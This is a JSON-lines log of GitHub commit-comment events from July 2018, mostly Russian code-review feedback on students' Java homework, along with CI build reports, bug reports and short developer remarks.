{"id":"7967101935","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712098,"position":2,"line":2,"path":"src/by/itAcademy/homeWorks/lesson2/Task1.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:45:10Z","updated_at":"2018-07-15T09:45:10Z","author_association":"NONE","body":"camel case для названий пакетов не распространяется"}},"created_at":"2018-07-15T09:45:10Z"}
{"id":"7967102872","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712103,"position":6,"line":6,"path":"src/by/itAcademy/homeWorks/lesson2/Task1.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:45:53Z","updated_at":"2018-07-15T09:45:53Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T09:45:53Z"}
{"id":"7967103333","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712104,"position":8,"line":8,"path":"src/by/itAcademy/homeWorks/lesson2/Task1.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:46:15Z","updated_at":"2018-07-15T09:46:15Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-15T09:46:15Z"}
{"id":"7967103360","type":"CommitCommentEvent","actor":{"login":"cioan"},"repo":{"name":"PIH/openmrs-module-pihmalawi"},"payload":{"comment":{"id":29712105,"position":26,"line":75,"path":"omod/src/main/webapp/resources/htmlforms/chf_visit.xml","commit_id":"6cb02904242d180033829216d6b7de9a7b2592d8","created_at":"2018-07-15T09:46:17Z","updated_at":"2018-07-15T09:46:17Z","author_association":"MEMBER","body":"Hi @tlimbani , is the **dietSaltFluid** variable defined twice here? Maybe a duplicate? Is it possible to use concept UUIDs as oppose to concept IDs? Thanks."}},"created_at":"2018-07-15T09:46:17Z"}
{"id":"7967103864","type":"CommitCommentEvent","actor":{"login":"desmond75"},"repo":{"name":"desmond75/desmond75.github.io"},"payload":{"comment":{"id":29712107,"position":null,"line":null,"path":null,"commit_id":"64eb92501b292e5e2f391f5008a44d5fe3d0fa66","created_at":"2018-07-15T09:46:42Z","updated_at":"2018-07-15T09:46:42Z","author_association":"OWNER","body":"![mobil](https://user-images.githubusercontent.com/27916806/42732596-2d374466-87d9-11e8-9330-b2a232f0cb74.PNG)\r\n"}},"created_at":"2018-07-15T09:46:42Z"}
{"id":"7967104418","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712108,"position":16,"line":16,"path":"src/by/itAcademy/homeWorks/lesson2/Task1.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:47:08Z","updated_at":"2018-07-15T09:47:08Z","author_association":"NONE","body":"printDay название не совсем корректно, оно не печатает дату, а формирует строку, название функции должно отражать то, что действительно она делает"}},"created_at":"2018-07-15T09:47:08Z"}
{"id":"7967104826","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29712110,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T09:47:26Z","updated_at":"2018-07-15T09:47:26Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2315 of 2315 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-15T09:47:26Z"}
{"id":"7967105035","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712111,"position":17,"line":17,"path":"src/by/itAcademy/homeWorks/lesson2/Task1.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:47:37Z","updated_at":"2018-07-15T09:47:37Z","author_association":"NONE","body":"комментарии в коде можно оставлять только перед методом или перед классом, в коде их быть не должно"}},"created_at":"2018-07-15T09:47:37Z"}
{"id":"7967106036","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712112,"position":34,"line":34,"path":"src/by/itAcademy/homeWorks/lesson2/Task1.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:48:28Z","updated_at":"2018-07-15T09:48:28Z","author_association":"NONE","body":"располагать функции последовательно друг за другом, как будто это чтение страницы книги, а то isLongMonth стоит перед printDay, хотя printDay ее вызывает, а не наоборот"}},"created_at":"2018-07-15T09:48:28Z"}
{"id":"7967106408","type":"CommitCommentEvent","actor":{"login":"rootnanu"},"repo":{"name":"rootnanu/CODES"},"payload":{"comment":{"id":29712115,"position":1,"line":1,"path":"Arrey Sorter.html","commit_id":"8e56c4f505674ef21abe2301788c84258f8b74dd","created_at":"2018-07-15T09:48:47Z","updated_at":"2018-07-15T09:48:47Z","author_association":"OWNER","body":"*This document is Developed by Nishant Maheshwari for Sorting Arrey*"}},"created_at":"2018-07-15T09:48:47Z"}
{"id":"7967106496","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29712116,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T09:48:52Z","updated_at":"2018-07-15T09:48:52Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T09:48:52Z"}
{"id":"7967106507","type":"CommitCommentEvent","actor":{"login":"tohojo"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":29712117,"position":null,"line":null,"path":null,"commit_id":"52cbc000aed8da9b3bd511fe7ffda7c8ae3a0eb0","created_at":"2018-07-15T09:48:53Z","updated_at":"2018-07-15T09:48:53Z","author_association":"COLLABORATOR","body":"survient <notifications@github.com> writes:\n\n> I am having issues compiling on Fedora 28 with this latest commit, the\n> previous commit of 6cdb4962597e0da4d472dc11b1b88aeceac35635 works\n> fine. Errors below:\n\nI think this is the same issue that Kevin noticed with wrong order of\nincludes. Could you please try the latest commit and see if that works? :)\n"}},"created_at":"2018-07-15T09:48:53Z"}
{"id":"7967106658","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712118,"position":41,"line":41,"path":"src/by/itAcademy/homeWorks/lesson2/Task2.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:49:00Z","updated_at":"2018-07-15T09:49:00Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T09:49:00Z"}
{"id":"7967106877","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712119,"position":38,"line":38,"path":"src/by/itAcademy/homeWorks/lesson2/Task2.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:49:10Z","updated_at":"2018-07-15T09:49:10Z","author_association":"NONE","body":"даже если одна строчка в else - все равно ставим скобочки"}},"created_at":"2018-07-15T09:49:10Z"}
{"id":"7967108227","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712120,"position":15,"line":15,"path":"src/by/itAcademy/homeWorks/lesson2/Task3.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:50:18Z","updated_at":"2018-07-15T09:50:18Z","author_association":"NONE","body":"название переменных с маленькой буквы"}},"created_at":"2018-07-15T09:50:18Z"}
{"id":"7967108572","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712121,"position":19,"line":19,"path":"src/by/itAcademy/homeWorks/lesson2/Task3.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:50:40Z","updated_at":"2018-07-15T09:50:40Z","author_association":"NONE","body":"else if конструкция пишется в одну строку"}},"created_at":"2018-07-15T09:50:40Z"}
{"id":"7967109194","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712122,"position":20,"line":20,"path":"src/by/itAcademy/homeWorks/lesson2/Task3.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:51:11Z","updated_at":"2018-07-15T09:51:11Z","author_association":"NONE","body":"исключительные ситуации нужно обрабатывать в конце"}},"created_at":"2018-07-15T09:51:11Z"}
{"id":"7967109935","type":"CommitCommentEvent","actor":{"login":"LiuShs"},"repo":{"name":"LiuShs/Pictures"},"payload":{"comment":{"id":29712124,"position":null,"line":null,"path":null,"commit_id":"2d36f6b9e1d802c6403027fa1d8b7ae037a953b8","created_at":"2018-07-15T09:51:52Z","updated_at":"2018-07-15T09:51:52Z","author_association":"OWNER","body":"\r\n![Uploading JavaSE35.png…]()\r\n![Uploading JavaSE36.png…]()\r\n![Uploading JavaSE37.png…]()\r\n![Uploading JavaSE38.png…]()\r\n![Uploading JavaSE39.png…]()\r\n![Uploading JavaSE40.png…]()\r\n![Uploading JavaSE41.png…]()\r\n![Uploading JavaSE42.png…]()\r\n"}},"created_at":"2018-07-15T09:51:52Z"}
{"id":"7967110747","type":"CommitCommentEvent","actor":{"login":"e4rache"},"repo":{"name":"e4rache/nodeMongoShop"},"payload":{"comment":{"id":29712125,"position":20,"line":20,"path":"api/routes/users.js","commit_id":"5f9d5351f326d483ae24b3cdb9fe98bed9452c65","created_at":"2018-07-15T09:52:34Z","updated_at":"2018-07-15T09:52:34Z","author_association":"OWNER","body":"this of course should be bcrypt.hash(req.body.password, ..."}},"created_at":"2018-07-15T09:52:34Z"}
{"id":"7967111036","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712126,"position":21,"line":21,"path":"src/by/itAcademy/homeWorks/lesson3/Task1.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:52:51Z","updated_at":"2018-07-15T09:52:51Z","author_association":"NONE","body":"в общем, ты понял, что комментариев таких быть не должно в коде)"}},"created_at":"2018-07-15T09:52:51Z"}
{"id":"7967111841","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712130,"position":21,"line":21,"path":"src/by/itAcademy/homeWorks/lesson3/Task2.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:53:32Z","updated_at":"2018-07-15T09:53:32Z","author_association":"NONE","body":"у тебя оба случая - рекурсия))"}},"created_at":"2018-07-15T09:53:32Z"}
{"id":"7967112254","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712131,"position":48,"line":48,"path":"src/by/itAcademy/homeWorks/lesson3/Task2.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:53:54Z","updated_at":"2018-07-15T09:53:54Z","author_association":"NONE","body":"не оставляй столько ненужных пустых строк после класса"}},"created_at":"2018-07-15T09:53:54Z"}
{"id":"7967112632","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712132,"position":37,"line":37,"path":"src/by/itAcademy/homeWorks/lesson3/Task2.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:54:15Z","updated_at":"2018-07-15T09:54:15Z","author_association":"NONE","body":"else не уместен здесь, просто return, не усложняй"}},"created_at":"2018-07-15T09:54:15Z"}
{"id":"7967113433","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeWorks"},"payload":{"comment":{"id":29712135,"position":23,"line":23,"path":"src/by/itAcademy/homeWorks/lesson3/Task3.java","commit_id":"29cd613c38fa5914da68a021502bbe90be9f7c7a","created_at":"2018-07-15T09:54:57Z","updated_at":"2018-07-15T09:54:57Z","author_association":"NONE","body":"вещественная часть пропадет, приводить к double"}},"created_at":"2018-07-15T09:54:57Z"}
{"id":"7967113623","type":"CommitCommentEvent","actor":{"login":"e4rache"},"repo":{"name":"e4rache/nodeMongoShop"},"payload":{"comment":{"id":29712136,"position":null,"line":null,"path":null,"commit_id":"5f9d5351f326d483ae24b3cdb9fe98bed9452c65","created_at":"2018-07-15T09:55:08Z","updated_at":"2018-07-15T09:55:08Z","author_association":"OWNER","body":"there's a bug in this commit. See https://github.com/e4rache/nodeMongoShop/commit/5f9d5351f326d483ae24b3cdb9fe98bed9452c65#diff-25af5654f99c31ad56b798603bd0d519"}},"created_at":"2018-07-15T09:55:08Z"}
{"id":"7967114231","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712137,"position":5,"line":5,"path":"src/com/itacademy/lesson2HomeWork/Task1DataDay.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T09:55:42Z","updated_at":"2018-07-15T09:55:42Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T09:55:42Z"}
{"id":"7967114308","type":"CommitCommentEvent","actor":{"login":"samucaweb"},"repo":{"name":"samucaweb/modulogit"},"payload":{"comment":{"id":29712138,"position":null,"line":null,"path":null,"commit_id":"4f1467020d36e4712f3a096b7d322d7ba9ceafec","created_at":"2018-07-15T09:55:46Z","updated_at":"2018-07-15T09:55:46Z","author_association":"OWNER","body":"arquivos adicionados "}},"created_at":"2018-07-15T09:55:46Z"}
{"id":"7967114507","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712139,"position":1,"line":1,"path":"src/com/itacademy/lesson2HomeWork/Task1DataDay.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T09:55:57Z","updated_at":"2018-07-15T09:55:57Z","author_association":"NONE","body":"названия пакетов не надо в camel case, читаем код конвеншен"}},"created_at":"2018-07-15T09:55:57Z"}
{"id":"7967114741","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712140,"position":8,"line":8,"path":"src/com/itacademy/lesson2HomeWork/Task1DataDay.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T09:56:11Z","updated_at":"2018-07-15T09:56:11Z","author_association":"NONE","body":"комментарии в коде можно оставлять только перед методом или перед классом, в коде их быть не должно "}},"created_at":"2018-07-15T09:56:11Z"}
{"id":"7967115889","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712141,"position":37,"line":37,"path":"src/com/itacademy/lesson2HomeWork/Task1DataDay.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T09:57:14Z","updated_at":"2018-07-15T09:57:14Z","author_association":"NONE","body":"исключительные ситуации лучше обработать один раз в начале метода,  а не размазывать по всему алгоритму, чище и читабельнее код"}},"created_at":"2018-07-15T09:57:14Z"}
{"id":"7967116417","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712143,"position":44,"line":44,"path":"src/com/itacademy/lesson2HomeWork/Task1DataDay.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T09:57:41Z","updated_at":"2018-07-15T09:57:41Z","author_association":"NONE","body":"просто month++"}},"created_at":"2018-07-15T09:57:41Z"}
{"id":"7967116993","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712145,"position":86,"line":86,"path":"src/com/itacademy/lesson2HomeWork/Task1DataDay.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T09:58:13Z","updated_at":"2018-07-15T09:58:13Z","author_association":"NONE","body":"\r\nкод не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T09:58:13Z"}
{"id":"7967117541","type":"CommitCommentEvent","actor":{"login":"sebhoerl"},"repo":{"name":"idsc-frazzoli/amod"},"payload":{"comment":{"id":29712147,"position":null,"line":null,"path":null,"commit_id":"f3f4976d2bc205d0b939dc70b4f605c827aab320","created_at":"2018-07-15T09:58:45Z","updated_at":"2018-07-15T09:58:45Z","author_association":"COLLABORATOR","body":"@datahaki @claudioglasses I think I have an idea what is going wrong there (but didn't have time to test it). The SanFrancisco scenario contains the \"linkSpeedData\" file, while the others don't. And Amodeus right now USES the linkSpeedData if the file is present and it DOESN'T USE linkSpeedData if the file does not exist. Now, if San Francisco is run first, the linkSpeedData file is unpacked into the working directory. If Tel Aviv is run afterwards it wouldn't create such a file and hence not use it. However, because the file still exists from San Francisco, it is probably loaded in Tel Aviv / Santiago, which then leads to the error. So simple solution might just be to properly clean up the files after running one scenario. But not 100% sure."}},"created_at":"2018-07-15T09:58:45Z"}
{"id":"7967118317","type":"CommitCommentEvent","actor":{"login":"hardik66"},"repo":{"name":"nebulasio/go-nebulas"},"payload":{"comment":{"id":29712148,"position":null,"line":null,"path":null,"commit_id":"c0cd6b361ce19bc21b997a4b5218cd0173fc9277","created_at":"2018-07-15T09:59:31Z","updated_at":"2018-07-15T09:59:31Z","author_association":"NONE","body":"n1HK2wagyY4FH5699SefaqKZLm4i3bTcBFE"}},"created_at":"2018-07-15T09:59:31Z"}
{"id":"7968173401","type":"CommitCommentEvent","actor":{"login":"kykdev"},"repo":{"name":"esa-n/android_kernel_lge_hammerhead"},"payload":{"comment":{"id":29714834,"position":null,"line":null,"path":null,"commit_id":"c009c09f2f8413b68fd9a54c547ffb497ab75d6a","created_at":"2018-07-16T00:01:28Z","updated_at":"2018-07-16T00:01:28Z","author_association":"NONE","body":"Are you releasing a kernel with these changes somewhere on the web is it for your own usage?"}},"created_at":"2018-07-16T00:01:28Z"}
{"id":"7968173808","type":"CommitCommentEvent","actor":{"login":"trvrb"},"repo":{"name":"nextstrain/docker-base"},"payload":{"comment":{"id":29714836,"position":null,"line":null,"path":null,"commit_id":"67e65aa45e1066d734836e54bc2344b981345880","created_at":"2018-07-16T00:01:45Z","updated_at":"2018-07-16T00:01:45Z","author_association":"MEMBER","body":"Docker bases cache on a string match to the `RUN` command, thus even if `master` has been updated, the command `RUN curl -fsSL https://api.github.com/repos/nextstrain/augur/tarball/master` won't break the cache. According to this: https://github.com/moby/moby/issues/22832, the best current way to do this is through `ARG` variables that differ at runtime."}},"created_at":"2018-07-16T00:01:45Z"}
{"id":"7968174724","type":"CommitCommentEvent","actor":{"login":"pedro-roberto"},"repo":{"name":"lightningnetworkstores/lightningnetworkstores.github.io"},"payload":{"comment":{"id":29714838,"position":null,"line":null,"path":null,"commit_id":"578fec8674c4208b8ad99c0ed3a776c1cf7577ab","created_at":"2018-07-16T00:02:30Z","updated_at":"2018-07-16T00:02:30Z","author_association":"COLLABORATOR","body":"Another test commit"}},"created_at":"2018-07-16T00:02:30Z"}
{"id":"7968175797","type":"CommitCommentEvent","actor":{"login":"fokkonaut"},"repo":{"name":"ChillerDragon/DDNetPP"},"payload":{"comment":{"id":29714839,"position":null,"line":null,"path":null,"commit_id":"b3d6d134314a2e4bc7ddf6ba7b4e9cf7eac08087","created_at":"2018-07-16T00:03:22Z","updated_at":"2018-07-16T00:03:22Z","author_association":"CONTRIBUTOR","body":"and for people who already have an account? :)"}},"created_at":"2018-07-16T00:03:22Z"}
{"id":"7968178023","type":"CommitCommentEvent","actor":{"login":"MemZ14"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29714843,"position":null,"line":null,"path":null,"commit_id":"e8d10a1cf127c7d3d4413ffa852be099571ab84f","created_at":"2018-07-16T00:05:18Z","updated_at":"2018-07-16T00:05:18Z","author_association":"NONE","body":"Thank you HazeDumper for Updating the Correct Offsets"}},"created_at":"2018-07-16T00:05:18Z"}
{"id":"7968178464","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29714844,"position":null,"line":null,"path":null,"commit_id":"85388901cf6a69659569ad751767fd7108b25a3c","created_at":"2018-07-16T00:05:40Z","updated_at":"2018-07-16T00:05:40Z","author_association":"MEMBER","body":"ok convinced"}},"created_at":"2018-07-16T00:05:40Z"}
{"id":"7968181593","type":"CommitCommentEvent","actor":{"login":"drummerrev"},"repo":{"name":"drummerrev/Ruby"},"payload":{"comment":{"id":29714850,"position":null,"line":null,"path":null,"commit_id":"ee35a947695b1e8d1f68998c8aca28678eb99e59","created_at":"2018-07-16T00:08:14Z","updated_at":"2018-07-16T00:08:14Z","author_association":"OWNER","body":"This is OK - let's put this one back"}},"created_at":"2018-07-16T00:08:14Z"}
{"id":"7968185736","type":"CommitCommentEvent","actor":{"login":"uhyun9930"},"repo":{"name":"uhyun9930/ScanUtilityAutomation"},"payload":{"comment":{"id":29714853,"position":56,"line":56,"path":"suauto","commit_id":"c20d73a847af9794f0f245d6924932c184660220","created_at":"2018-07-16T00:11:59Z","updated_at":"2018-07-16T00:11:59Z","author_association":"OWNER","body":"\r\nint CSU_auto2App::ExecuteOutsideEditor()\r\n{\r\n\r\n\tSTARTUPINFO sinfo;\r\n\t//CString szCmdLine; \r\n\t//szCmdLine.Format(\"c:\\\\Windows\\\\notepad.exe c:\\\\help.txt\");\r\n\t\r\n\r\n\tLPTSTR szCmdline=_tcsdup(TEXT(\"C:\\\\Program Files\\\\Canon\\\\MF Scan Utility\\\\MFSCANUTILITY.exe\")); //SU 위치 저장 \r\n\r\n\tif(IsOutsideEditorRunning())\r\n\t\treturn -2;\r\n\tmemset(&sinfo, 0x00, sizeof(sinfo)); \r\n\r\n\t//if(CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &sinfo, &pinfo))\r\n\tif(CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, 0, NULL, NULL, &sinfo, &pinfo))\r\n\t\treturn -1;\r\n\r\n\telse\r\n\t\treturn 0;\r\n\r\n}"}},"created_at":"2018-07-16T00:11:59Z"}
{"id":"7968186156","type":"CommitCommentEvent","actor":{"login":"uhyun9930"},"repo":{"name":"uhyun9930/ScanUtilityAutomation"},"payload":{"comment":{"id":29714854,"position":56,"line":56,"path":"suauto","commit_id":"c20d73a847af9794f0f245d6924932c184660220","created_at":"2018-07-16T00:12:21Z","updated_at":"2018-07-16T00:12:21Z","author_association":"OWNER","body":"visual c++ 2010 에서는 형식이 조금 다름"}},"created_at":"2018-07-16T00:12:21Z"}
{"id":"7968187497","type":"CommitCommentEvent","actor":{"login":"datitisev"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29714856,"position":null,"line":null,"path":null,"commit_id":"fb9a89f67ffc3cc81ed765d459745ca8dc73c229","created_at":"2018-07-16T00:13:29Z","updated_at":"2018-07-16T00:13:29Z","author_association":"CONTRIBUTOR","body":"@TurboProgramming Yes, this works in the latest version as well if you use `dev-master`. Whenever you are testing code that includes LESS syntax, use the admin interface to add the styles instead of the DevTools."}},"created_at":"2018-07-16T00:13:29Z"}
{"id":"7968188638","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714857,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T00:14:25Z","updated_at":"2018-07-16T00:14:25Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T00:14:25Z"}
{"id":"7968194040","type":"CommitCommentEvent","actor":{"login":"CoryHawkless"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":29714873,"position":null,"line":null,"path":null,"commit_id":"ad6ec7f72a7d7326859985a8981b9106259f2d8d","created_at":"2018-07-16T00:18:38Z","updated_at":"2018-07-16T00:18:38Z","author_association":"NONE","body":"Ditto, I'm seeing the following on 2 seperate LibreNMS servers.\r\nThis has rendered the Web UI unusable, seems the poller is still working though\r\n\r\n```\r\nPHP message: [2018-07-16 09:45:17] production.ERROR: Symfony\\Component\\Debug\\Exception\\FatalThrowableError: Class 'Wpb\\String_Blade_Compiler\\ViewServiceProvider' not found in /mnt/disk1/librenms/vendor/laravel/framework/src/Illuminate/Foundation/ProviderRepository.php:208\r\nStack trace:\r\n#0 /mnt/disk1/librenms/vendor/laravel/framework/src/Illuminate/Foundation/ProviderRepository.php(144): Illuminate\\Foundation\\ProviderRepository->createProvider('Wpb\\\\String_Blad...')\r\n#1 /mnt/disk1/librenms/vendor/laravel/framework/src/Illuminate/Foundation/ProviderRepository.php(61): Illuminate\\Foundation\\ProviderRepository->compileManifest(Array)\r\n#2 /mnt/disk1/librenms/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(549): Illuminate\\Foundation\\ProviderRepository->load(Array)\r\n#3 /mnt/disk1/librenms/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/RegisterProviders.php(17): Illuminate\\Foundation\\Application->registerConfiguredProviders()\r\n#4 /mnt/disk1/librenms/vendor/laravel/framework/src/Illumi\" while reading response header from upstream, client: 172.20.0.167, server: , request: \"GET / HTTP/1.1\", upstream: \"fastcgi://unix:/var/run/php/php7.2-fpm.sock:\", host: \"nms1\"\r\n\r\n```"}},"created_at":"2018-07-16T00:18:38Z"}
{"id":"7968194501","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29714876,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-16T00:19:06Z","updated_at":"2018-07-16T00:19:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T00:19:06Z"}
